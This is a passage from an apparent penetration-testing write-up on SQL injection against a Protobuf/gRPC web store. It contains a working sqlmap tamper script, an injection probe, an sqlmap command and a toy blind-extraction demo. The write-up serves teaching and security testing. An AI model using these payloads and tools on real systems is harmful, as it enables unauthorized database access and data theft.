As a result we get a library to import in our code to serialize/deserialize our messages, as seen in the script's import statement (import search_pb2).


import struct
from base64 import b64encode, b64decode
import search_pb2

def encode(array):
    """Function to serialize an array of tuples"""
    products = search_pb2.Product()
    for tup in array:
        p = products.product.add()
        p.name = str(tup[0])
        p.quantity = int(tup[1])

    serializedString = products.SerializeToString()
    serializedString = b64encode(b'\x00' + struct.pack(">I", len(serializedString)) + serializedString).decode("utf-8")

    return serializedString

test = encode([('tortellini', 0)])
print (test)

The output for the string "tortellini" is the same as the one in our browser request, demonstrating that the encoding process worked properly.
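For completeness, the same request can also be built without compiling a .proto file, by emitting the wire format by hand. This is a sketch that assumes the two-field message inferred in Step 1, with names and values shorter than 128 bytes:

```python
import base64
import struct

def encode_search(name, quantity):
    # field 1 (tag 0x0a): length-delimited string; field 2 (tag 0x10): varint
    body = b"\x0a" + bytes([len(name)]) + name.encode()
    body += b"\x10" + bytes([quantity])
    # gRPC 5-byte prefix: compression flag + big-endian message length
    frame = b"\x00" + struct.pack(">I", len(body)) + body
    return base64.b64encode(frame).decode()

print(encode_search("tortellini", 0))
```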


Step 3 - Discovering the injection

To discover the SQL injection vulnerability we opted for manual inspection, sending a single quote (') in order to induce a server error. Analyzing the web application endpoint:


we could guess that the SQL query is something similar to:

SELECT id, product, amount FROM products WHERE product LIKE '%PAYLOAD%';

This means that by injecting a single quote within the request we could induce the server to process a malformed query:

SELECT id, product, amount FROM products WHERE product LIKE '%'%';

thus producing a 500 server error. To check this manually, we had to serialize our payload with the Protobuf compiler and encode it in base64 before sending it. We reused the script from Step 2, modifying the following line:

test = encode([("'", 0)])

After running the script we see the following output:


By sending the generated serialized string as payload to the vulnerable endpoint:


the application returns an HTTP 500 error, indicating that the query has been broken.


Since we wanted to automate the dump process, sqlmap was a good candidate for this task because of its tamper scripting feature.

Step 4 - Coding the tamper

Once we understood the behaviour of the Protobuf encoding process, coding a sqlmap tamper script was a piece of cake.

#!/usr/bin/env python

from lib.core.data import kb
from lib.core.enums import PRIORITY

import base64
import struct
import search_pb2

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        # Instantiating objects
        products = search_pb2.Product()
        p = products.product.add()
        p.name = payload
        p.quantity = 1

        # Serializing the string
        serializedString = products.SerializeToString()
        serializedString = b'\x00' + struct.pack(">I",len(serializedString)) + serializedString

        # Encoding the serialized string in base64
        b64serialized = base64.b64encode(serializedString).decode("utf-8")
        retVal = b64serialized

    return retVal

To make it work we moved the tamper in the sqlmap tamper directory /usr/share/sqlmap/tamper/ along with the Protobuf compiled library.

Here is the logic behind the tamper's workings:


Step 5 - Exploiting Protobuf - Control is an illusion

We intercepted the HTTP request and added a star (*) to tell sqlmap where to inject the code.

GET /search/* HTTP/1.1
Host: brodostore
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


After saving the request to the test.txt file, we ran sqlmap with the following command:

sqlmap -r test.txt --tamper brodobug --technique=BT --level=5 --risk=3


Why is it slow?

Unfortunately sqlmap is not able to understand the Protobuf-encoded responses. Because of that, we decided to take the path of boolean-based blind SQL injection: we had to "bruteforce" the value of every character of every string we wanted to dump, using the different responses the application returns when the SQLi succeeds. This approach is really slow compared to other SQL injection techniques, but for this test case it was enough to demonstrate how to exploit web applications that implement Protobuf. In the future, between one plate of tortellini and another, we could decide to implement a mechanism that decodes the responses via the *.proto struct and then expand it to other attack paths… but for now we are satisfied with that! Until next time folks!
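The character-by-character bruteforce that makes this technique slow can be illustrated with a self-contained toy. Here SQLite stands in for the real backend, and the table and query shape follow the guess from Step 3 (all names are made up for the demo):

```python
import sqlite3

# Toy stand-in for the target application's database
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (id INTEGER, product TEXT, amount INTEGER)")
db.execute("INSERT INTO products VALUES (1, 'tortellini', 1337)")

def returns_rows(payload):
    """Boolean oracle: does the injectable search return any rows?"""
    query = "SELECT id, product, amount FROM products WHERE product LIKE '%" + payload + "%'"
    try:
        return len(db.execute(query).fetchall()) > 0
    except sqlite3.OperationalError:  # broken query -> the HTTP 500 case
        return False

# Recover the product name one character at a time
recovered = ""
for pos in range(1, 11):
    for c in "abcdefghijklmnopqrstuvwxyz":
        # '--' comments out the trailing %' of the original query
        inj = "tortellini' AND substr(product,%d,1)='%s' --" % (pos, c)
        if returns_rows(inj):
            recovered += c
            break
print(recovered)  # tortellini
```

A real attack replaces the oracle with an HTTP request (serialized through the tamper above), which is exactly what sqlmap automates.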